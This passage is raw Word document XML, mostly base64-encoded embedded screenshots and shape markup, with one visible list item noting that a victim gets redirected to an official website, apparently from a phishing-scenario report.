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9+ntHADAABsCAAADgAAAAAA&#10;AAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEAywkn4eNaAADjWgAAFAAA&#10;AAAAAAAAAAAAAADWBQAAZHJzL21lZGlhL2ltYWdlMS5wbmdQSwECLQAUAAYACAAAACEAM4k9d+AA&#10;AAAKAQAADwAAAAAAAAAAAAAAAADrYAAAZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAhAKom&#10;Dr68AAAAIQEAABkAAAAAAAAAAAAAAAAA+GEAAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUG&#10;AAAAAAYABgB8AQAA62IAAAAA&#10;">
                <v:shape id="Image 23" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:95;top:95;width:38373;height:17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vwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvBf9DeIXearYWbN0aRQqCoB6qBa+PzXMTunlZknR37a9vBMHjMDPfMPPl4BrRUYjWs4KXcQGC&#10;uPLacq3g+7h+fgcRE7LGxjMpuFCE5WL0MMdS+56/qDukWmQIxxIVmJTaUspYGXIYx74lzt7ZB4cp&#10;y1BLHbDPcNfISVFMpUPLecFgS5+Gqp/Dr1PQ7E9vx1nR9eftX21c6Gy781app8dh9QEi0ZDu4Vt7&#10;oxVMXuH6Jf8AufgHAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAPmTsL8MAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;">
                  <v:imagedata r:id="rId25" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 24" o:spid="_x0000_s1028" style="position:absolute;left:47;top:47;width:38468;height:17571;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3846829,17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Py9wwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasJA&#10;FIX3gu8wXMGN1ImhFEkzCSIoQrsxFmx3l8w1CcnciZlR07fvFApdHs7Px0nz0XTiToNrLCtYLSMQ&#10;xKXVDVcKPk67pzUI55E1dpZJwTc5yLPpJMVE2wcf6V74SoQRdgkqqL3vEyldWZNBt7Q9cfAudjDo&#10;gxwqqQd8hHHTyTiKXqTBhgOhxp62NZVtcTOB+35q38znmdziWPT0VewjvMZKzWfj5hWEp9H/h//a&#10;B60gfobfL+EHyOwHAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAAdz8vcMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,1757045r3846829,l3846829,,,,,1757045xe" filled="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="171DCA3E" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="611"/>
        </w:tabs>
        <w:spacing w:before="194" w:after="14"/>
        <w:ind w:left="611" w:hanging="251"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>redirected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Official</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE458A7" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="374"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6909C285" wp14:editId="36784D2C">
                <wp:extent cx="3689350" cy="1851025"/>
                <wp:effectExtent l="0" t="0" r="0" b="635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9350" cy="1851025"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3689350" cy="1851025"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="26" name="Image 26"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId26" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="9525" y="9461"/>
                            <a:ext cx="3670173" cy="1822815"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="27" name="Graphic 27"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4762" y="4762"/>
                            <a:ext cx="3679825" cy="1841500"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="3679825" h="1841500">
                                <a:moveTo>
                                  <a:pt x="0" y="1841500"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3679698" y="1841500"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3679698" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="18415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293CD95" id="Group 25" o:spid="_x0000_s1026" style="width:290.5pt;height:145.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="36893,18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LZ2AwAAbAgAAA4AAABkcnMvZTJvRG9jLnhtbJxWbU/bMBD+Pmn/&#10;wcp3SFPoW0RB09gQ0rShwbTPruMkFo7t2e4L/353dtwGuokNJJpzfb4899xz515c7TpJNtw6odUy&#10;K05HGeGK6UqoZpn9ePh8Ms+I81RVVGrFl9kTd9nV5ft3F1tT8rFutay4JRBEuXJrllnrvSnz3LGW&#10;d9SdasMVbNbadtTD0jZ5ZekWoncyH49G03yrbWWsZtw5+PY6bmaXIX5dc+a/1bXjnshlBth8+LTh&#10;c4Wf+eUFLRtLTStYD4O+AUVHhYKX7kNdU0/J2oqjUJ1gVjtd+1Omu1zXtWA85ADZFKMX2dxYvTYh&#10;l6bcNmZPE1D7gqc3h2VfNzfW3Js7G9GD+UWzRwe85FvTlMN9XDcH511tOzwESZBdYPRpzyjfecLg&#10;y7PpfHE2AeIZ7BXzSTEaTyLnrIXCHJ1j7adXTua0jC8O8PZwjGAl/PcUgXVE0etSglN+bXnWB+n+&#10;KUZH7ePanEA1DfViJaTwT0GZUDcEpTZ3giG7uAA27ywR1TIbTzOiaAcdcdvRhhNYA+XJB09gBY4C&#10;rKQwn4WUyDvaPVQQ9AtB/CHbKLZrzdYdVz52j+USUGvlWmFcRmzJuxUHePa2KqBo0LkeIBorlI9l&#10;c95yz1p8fw04vkODIVBa7jcC6ANOTMH18nqhmMUExEBAGIvzaRHDH3QzGxWzs6Sb8XheBN3sq09L&#10;Y52/4bojaABiQAKU05JuvrgeU3LpmYwwAj5AhSMCZo5LHMLqiMX/aqv7lhoOEDDsoNCzVOibfsqM&#10;Z5hr74Wd16/+wtL5bDoOLAUDfGk5YGkxRw5jd50Xk1GYaAOW2DqyNGQGplQVOQK22mSxnUomcokD&#10;U4aB6UEXwG9GYGCuYplA6ngOg6JJttjps4ilxUaPUHC/0xv+oIOnP7R78oB0AOzBR6qhL8acLuAG&#10;CcNjmF7yS08TYg/9ExHJIz2jJ0ykNKzg/WkvPYc+z5EmDya14xE8EhCy2JMCEYe0S4X8BLEjDU5L&#10;UaUedrZZfZSWbCjeT+EPGYYIz9xQyNfUtdEvbPVuUoE3aimqB62Vrp5gymxBbsvM/VpTHGnyVoG8&#10;8QZMhk3GKhnWy4863JOhXPDOh91Pak3fYR5k91UnlR81WvTFk0p/WHtdi9CFB0Q9UOi4YIUrLaTa&#10;X794Zw7XwevwI+HyNwAAAP//AwBQSwMECgAAAAAAAAAhANoIE3+MbwAAjG8AABUAAABkcnMvbWVk&#10;aWEvaW1hZ2UxLmpwZWf/2P/gABBKRklGAAEBAQBgAGAAAP/bAEMAAwICAwICAwMDAwQDAwQFCAUF&#10;BAQFCgcHBggMCgwMCwoLCw0OEhANDhEOCwsQFhARExQVFRUMDxcYFhQYEhQVFP/bAEMBAwQEBQQF&#10;CQUFCRQNCw0UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU&#10;FP/AABEIAY4DI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&#10;FgMX/hH3/wCey/lR/